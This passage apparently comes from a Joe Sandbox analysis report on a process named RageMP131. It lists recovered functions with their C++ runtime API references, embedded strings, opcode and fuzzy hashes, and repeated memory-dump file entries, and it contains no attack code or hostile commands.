std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 0062A283
std::_Lockit::~_Lockit.LIBCPMT ref: 0062A318
std::_Facet_Register.LIBCPMT ref: 0062A325

Strings

bad locale name, xrefs: 0062A33F

Memory Dump Source

Source File: 0000000C.00000002.4126981590.00000000005C1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 005C0000, based on PE: true

Associated: 0000000C.00000002.4126799618.00000000005C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4126981590.00000000006F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4127887985.00000000006F6000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4128039847.00000000006FC000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4128039847.000000000087B000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4128039847.0000000000962000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4128039847.00000000009A0000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4128039847.00000000009A9000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4128039847.00000000009B7000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4130115087.00000000009B8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4130531181.0000000000B5C000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4130572952.0000000000B5D000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4130629642.0000000000B60000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4130681821.0000000000B61000.00000080.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5c0000_RageMP131.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Locinfo::_$Facet_Locinfo_ctorLocinfo_dtorRegister
String ID: bad locale name
API String ID: 3375549084-1405518554
Opcode ID: eb15d4d5a58ccea16f681e38d12e4a124b8eee0357872a2b35296df6f660b822
Instruction ID: 4520bb9ea4f2fb13aca0336c54c8218bd6ba6c1c77e2a4e536d750809e56c57a
Opcode Fuzzy Hash: eb15d4d5a58ccea16f681e38d12e4a124b8eee0357872a2b35296df6f660b822
Instruction Fuzzy Hash: 1B617BB1D006589BDF50DFE4E849BAEBBF6AF04710F18401DE805A7341EBB5AA05CF96

Function 005C3770 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 152COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 005C37E9
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 005C3835
__Getctype.LIBCPMT ref: 005C384E
std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 005C386A
std::_Lockit::~_Lockit.LIBCPMT ref: 005C38FF

Strings

bad locale name, xrefs: 005C391C
0:\, xrefs: 005C3848

Memory Dump Source

Source File: 0000000C.00000002.4126981590.00000000005C1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 005C0000, based on PE: true

Associated: 0000000C.00000002.4126799618.00000000005C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4126981590.00000000006F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4127887985.00000000006F6000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4128039847.00000000006FC000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4128039847.000000000087B000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4128039847.0000000000962000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4128039847.00000000009A0000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4128039847.00000000009A9000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4128039847.00000000009B7000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4130115087.00000000009B8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4130531181.0000000000B5C000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4130572952.0000000000B5D000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4130629642.0000000000B60000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4130681821.0000000000B61000.00000080.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5c0000_RageMP131.jbxd

Yara matches

Similarity

API ID: std::_$Locinfo::_Lockit$GetctypeLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_
String ID: 0:\$bad locale name
API String ID: 1840309910-381323209
Opcode ID: acc14d78bc263a80ff7a547183b0480491646b17c0cdb51e91707a4aa77ac5b7
Instruction ID: 85dadb2b629b003dd1c15cde83567e63b6603cd8f7c5dc18547b40831c741856
Opcode Fuzzy Hash: acc14d78bc263a80ff7a547183b0480491646b17c0cdb51e91707a4aa77ac5b7
Instruction Fuzzy Hash: D7515DB1D002489FEF10DFE4D945B9EFBF9AF14710F14812DE804AB241E775AA48CB92

Function 0069FB30 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 132COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 0069FB67
___except_validate_context_record.LIBVCRUNTIME ref: 0069FB6F
_ValidateLocalCookies.LIBCMT ref: 0069FBF8
__IsNonwritableInCurrentImage.LIBCMT ref: 0069FC23
_ValidateLocalCookies.LIBCMT ref: 0069FC78

Strings

csm, xrefs: 0069FC0D

Memory Dump Source

Source File: 0000000C.00000002.4126981590.00000000005C1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 005C0000, based on PE: true

Associated: 0000000C.00000002.4126799618.00000000005C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4126981590.00000000006F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4127887985.00000000006F6000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4128039847.00000000006FC000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4128039847.000000000087B000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4128039847.0000000000962000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4128039847.00000000009A0000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4128039847.00000000009A9000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4128039847.00000000009B7000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4130115087.00000000009B8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4130531181.0000000000B5C000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4130572952.0000000000B5D000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4130629642.0000000000B60000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4130681821.0000000000B61000.00000080.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5c0000_RageMP131.jbxd

Yara matches

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 0cfc09b797f0cecec4d15548cb52071775a40f761062f0606ac0848a7e270661
Instruction ID: c6980bd0654e9df2564edadb583b94701c4113cb8d758c70f22ad7e66554c7f6
Opcode Fuzzy Hash: 0cfc09b797f0cecec4d15548cb52071775a40f761062f0606ac0848a7e270661
Instruction Fuzzy Hash: 1541C83190020CDBCF10EF68C894AAEBBAAAF45324F25C069EC14DB752D771ED41CB91

Function 006288E0 Relevance: 9.1, APIs: 6, Instructions: 121COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00628903
std::_Lockit::_Lockit.LIBCPMT ref: 00628926
std::_Lockit::~_Lockit.LIBCPMT ref: 00628946
std::_Facet_Register.LIBCPMT ref: 006289BB
std::_Lockit::~_Lockit.LIBCPMT ref: 006289D3
Concurrency::cancel_current_task.LIBCPMT ref: 006289EB

Memory Dump Source

Source File: 0000000C.00000002.4126981590.00000000005C1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 005C0000, based on PE: true

Associated: 0000000C.00000002.4126799618.00000000005C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4126981590.00000000006F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4127887985.00000000006F6000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4128039847.00000000006FC000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4128039847.000000000087B000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4128039847.0000000000962000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4128039847.00000000009A0000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4128039847.00000000009A9000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4128039847.00000000009B7000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4130115087.00000000009B8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4130531181.0000000000B5C000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4130572952.0000000000B5D000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4130629642.0000000000B60000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4130681821.0000000000B61000.00000080.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5c0000_RageMP131.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 2081738530-0
Opcode ID: e0bdf733a49c3733141872c4db60ba2316449b1d9769f12b21b64271864543ec
Instruction ID: c9029f6896445d316dd5a04902b74ce52702629516f2bc47d1272f8ecbd4cb18
Opcode Fuzzy Hash: e0bdf733a49c3733141872c4db60ba2316449b1d9769f12b21b64271864543ec
Instruction Fuzzy Hash: 6241DF71D016299FCB10DF98EC41ABABBB6FB04320F144259E9156B751DB30AE84CFD2

Function 005C5DD0 Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 424COMMON

Download Yara Rule

APIs

___std_exception_destroy.LIBVCRUNTIME ref: 005C60F2
___std_exception_destroy.LIBVCRUNTIME ref: 005C617F
___std_exception_copy.LIBVCRUNTIME ref: 005C6248

Strings

recursive_directory_iterator::operator++, xrefs: 005C61CC

Memory Dump Source

Source File: 0000000C.00000002.4126981590.00000000005C1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 005C0000, based on PE: true

Associated: 0000000C.00000002.4126799618.00000000005C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4126981590.00000000006F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4127887985.00000000006F6000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4128039847.00000000006FC000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4128039847.000000000087B000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4128039847.0000000000962000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4128039847.00000000009A0000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4128039847.00000000009A9000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4128039847.00000000009B7000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4130115087.00000000009B8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4130531181.0000000000B5C000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4130572952.0000000000B5D000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4130629642.0000000000B60000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4130681821.0000000000B61000.00000080.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5c0000_RageMP131.jbxd

Yara matches

Similarity

API ID: ___std_exception_destroy$___std_exception_copy
String ID: recursive_directory_iterator::operator++
API String ID: 1206660477-953255998
Opcode ID: 90e6da59351aeae158e6f0b831ddc9f4bdeae71c7804ff1bc68928d95c93b48b
Instruction ID: 08413dfb8df63a52a0f7290efaedbc90f32e6a05fbc46551035d60027a64b002
Opcode Fuzzy Hash: 90e6da59351aeae158e6f0b831ddc9f4bdeae71c7804ff1bc68928d95c93b48b
Instruction Fuzzy Hash: 77E1F4B09006049FDB18DF98D845FAEBBFAFF44300F14461DE456A7B82E774AA44CBA5

Function 005C84C0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 196COMMON

Download Yara Rule

APIs

___std_exception_destroy.LIBVCRUNTIME ref: 005C86DE
___std_exception_destroy.LIBVCRUNTIME ref: 005C86ED

Strings

, column , xrefs: 005C8555, 005C856B
at line , xrefs: 005C8518

Memory Dump Source

Source File: 0000000C.00000002.4126981590.00000000005C1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 005C0000, based on PE: true

Associated: 0000000C.00000002.4126799618.00000000005C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4126981590.00000000006F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4127887985.00000000006F6000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4128039847.00000000006FC000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4128039847.000000000087B000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4128039847.0000000000962000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4128039847.00000000009A0000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4128039847.00000000009A9000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4128039847.00000000009B7000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4130115087.00000000009B8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4130531181.0000000000B5C000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4130572952.0000000000B5D000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4130629642.0000000000B60000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4130681821.0000000000B61000.00000080.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5c0000_RageMP131.jbxd

Yara matches

Similarity

API ID: ___std_exception_destroy
String ID: at line $, column
API String ID: 4194217158-191570568
Opcode ID: 3abd2d2db09439d41dfa4d24e2551be5fce5a0e639af3d2d13fac6acfa9eed87
Instruction ID: c64b09841dabcf670b657a8fb7792b1431763f6087eccbf2f57a40131b36d04f
Opcode Fuzzy Hash: 3abd2d2db09439d41dfa4d24e2551be5fce5a0e639af3d2d13fac6acfa9eed87
Instruction Fuzzy Hash: BB612A71D002049FDB08DFA8DC85BADBFB6FF55310F14861CE415A7782EBB4AA848B95

Function 005C3B70 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 77COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 005C3C0F

Strings

ios_base::failbit set, xrefs: 005C3AC8, 005C3BB1
ios_base::badbit set, xrefs: 005C3BA7, 005C3BD2, 005C3BF3
ios_base::eofbit set, xrefs: 005C3BB6

Memory Dump Source

Source File: 0000000C.00000002.4126981590.00000000005C1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 005C0000, based on PE: true

Associated: 0000000C.00000002.4126799618.00000000005C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4126981590.00000000006F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4127887985.00000000006F6000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4128039847.00000000006FC000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4128039847.000000000087B000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4128039847.0000000000962000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4128039847.00000000009A0000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4128039847.00000000009A9000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4128039847.00000000009B7000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4130115087.00000000009B8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4130531181.0000000000B5C000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4130572952.0000000000B5D000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4130629642.0000000000B60000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4130681821.0000000000B61000.00000080.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5c0000_RageMP131.jbxd

Yara matches

Similarity

API ID: ___std_exception_copy
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 2659868963-1866435925
Opcode ID: e7aa58ccd639f3b69575b4ff2b2e8298f6b6753b5afca5eaefd30c7e45ebe9bd
Instruction ID: e8e903cddf8186aec111858d7a7d358ad1ec778b584b44c964f13b0e482ae77d
Opcode Fuzzy Hash: e7aa58ccd639f3b69575b4ff2b2e8298f6b6753b5afca5eaefd30c7e45ebe9bd
Instruction Fuzzy Hash: 4011D1B29007086FC710DF98D806F9ABBADAB05310F04852EFA5897641FB70A904CB91

Function 00631CF0 Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 444COMMON

Download Yara Rule

Strings

unordered_map/set too long, xrefs: 006321D3

Memory Dump Source

Source File: 0000000C.00000002.4126981590.00000000005C1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 005C0000, based on PE: true

Associated: 0000000C.00000002.4126799618.00000000005C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4126981590.00000000006F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4127887985.00000000006F6000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4128039847.00000000006FC000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4128039847.000000000087B000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4128039847.0000000000962000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4128039847.00000000009A0000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4128039847.00000000009A9000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4128039847.00000000009B7000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4130115087.00000000009B8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4130531181.0000000000B5C000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4130572952.0000000000B5D000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4130629642.0000000000B60000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4130681821.0000000000B61000.00000080.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5c0000_RageMP131.jbxd

Yara matches

Similarity

API ID:
String ID: unordered_map/set too long
API String ID: 0-306623848
Opcode ID: 53c603eceb749b7c565c211117a2a1a9a2a405b5bc9ada22e866407674cd9958
Instruction ID: 95e91ff012c5345b21686b1f9fa9293adedc9e5cc57e7d2f3423838f9a687f74
Opcode Fuzzy Hash: 53c603eceb749b7c565c211117a2a1a9a2a405b5bc9ada22e866407674cd9958
Instruction Fuzzy Hash: A5E1B071A006069FCB18DF68C991AA9B7F6FF49310F14826DE8199B391E730ED55CBD0

Function 005C8080 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 318COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 005C844D

Strings

parse error, xrefs: 005C8149, 005C8162
ror, xrefs: 005C80D4

Memory Dump Source

Source File: 0000000C.00000002.4126981590.00000000005C1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 005C0000, based on PE: true

Associated: 0000000C.00000002.4126799618.00000000005C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4126981590.00000000006F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4127887985.00000000006F6000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4128039847.00000000006FC000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4128039847.000000000087B000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4128039847.0000000000962000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4128039847.00000000009A0000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4128039847.00000000009A9000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4128039847.00000000009B7000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4130115087.00000000009B8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4130531181.0000000000B5C000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4130572952.0000000000B5D000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4130629642.0000000000B60000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4130681821.0000000000B61000.00000080.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5c0000_RageMP131.jbxd

Yara matches

Similarity

API ID: ___std_exception_copy
String ID: parse error$ror
API String ID: 2659868963-4201802366
Opcode ID: a0098d55dd1c083c1c2f729ad8c7438881c24250b2c32c1ac14e3f38714bdc69
Instruction ID: 853fd2fd5c5519cad413f7c0fc1f0d17086b4acb7703937a64e8715e1cee8822
Opcode Fuzzy Hash: a0098d55dd1c083c1c2f729ad8c7438881c24250b2c32c1ac14e3f38714bdc69
Instruction Fuzzy Hash: 1EC10471D006498FDB08CFA8CC85BADBBB6FF55304F14825CE405AB792DB74AA84CB91

Function 005C8920 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 298COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 005C8A93
___std_exception_copy.LIBVCRUNTIME ref: 005C8C71

Strings

ange, xrefs: 005C8B2F

Memory Dump Source

Source File: 0000000C.00000002.4126981590.00000000005C1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 005C0000, based on PE: true

Associated: 0000000C.00000002.4126799618.00000000005C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4126981590.00000000006F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4127887985.00000000006F6000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4128039847.00000000006FC000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4128039847.000000000087B000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4128039847.0000000000962000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4128039847.00000000009A0000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4128039847.00000000009A9000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4128039847.00000000009B7000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4130115087.00000000009B8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4130531181.0000000000B5C000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4130572952.0000000000B5D000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4130629642.0000000000B60000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4130681821.0000000000B61000.00000080.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5c0000_RageMP131.jbxd

Yara matches

Similarity

API ID: ___std_exception_copy
String ID: ange
API String ID: 2659868963-4159947239
Opcode ID: c97f711525860b6c149d4e664d6dfab6ed1e04df121322745797c397ce94cf6a
Instruction ID: 0c6b5584b240c17f2822e1b3ad8adc163248b61b1ba50006c93a1b53cf9148c3
Opcode Fuzzy Hash: c97f711525860b6c149d4e664d6dfab6ed1e04df121322745797c397ce94cf6a
Instruction Fuzzy Hash: 1AB1F271C002488FDB08CFA8CC84BADFBB5FF59314F14871DE4156B692EBB4A9848B55

Function 005C7DB0 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 233COMMON

Download Yara Rule

APIs

___std_exception_destroy.LIBVCRUNTIME ref: 005C8051
___std_exception_destroy.LIBVCRUNTIME ref: 005C8060

Strings

[json.exception., xrefs: 005C7E1C

Memory Dump Source

Source File: 0000000C.00000002.4126981590.00000000005C1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 005C0000, based on PE: true

Associated: 0000000C.00000002.4126799618.00000000005C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4126981590.00000000006F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4127887985.00000000006F6000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4128039847.00000000006FC000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4128039847.000000000087B000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4128039847.0000000000962000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4128039847.00000000009A0000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4128039847.00000000009A9000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4128039847.00000000009B7000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4130115087.00000000009B8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4130531181.0000000000B5C000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4130572952.0000000000B5D000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4130629642.0000000000B60000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4130681821.0000000000B61000.00000080.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5c0000_RageMP131.jbxd

Yara matches

Similarity

API ID: ___std_exception_destroy
String ID: [json.exception.
API String ID: 4194217158-791563284
Opcode ID: 8129629462bd598b26ff5f41f0916f311fade4723931467bcb99b4b4f3c7dda8
Instruction ID: 739ac8b6f9e0a082b8453ba1c7ec58e03e0489634cb541a9d70c331ff0b448d4
Opcode Fuzzy Hash: 8129629462bd598b26ff5f41f0916f311fade4723931467bcb99b4b4f3c7dda8
Instruction Fuzzy Hash: 6191FB719002089FDB18CFA8CC85FAEBFB6FF55310F14825DE411AB692D7749A84CB95

Function 005C3A90 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 150COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 005C3C0F

Strings

ios_base::failbit set, xrefs: 005C3AC8
ios_base::badbit set, xrefs: 005C3BA7, 005C3BD2, 005C3BF3

Memory Dump Source

Source File: 0000000C.00000002.4126981590.00000000005C1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 005C0000, based on PE: true

Associated: 0000000C.00000002.4126799618.00000000005C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4126981590.00000000006F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4127887985.00000000006F6000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4128039847.00000000006FC000.00000040.00000001.01000000.0000000B.sdmpDownload File
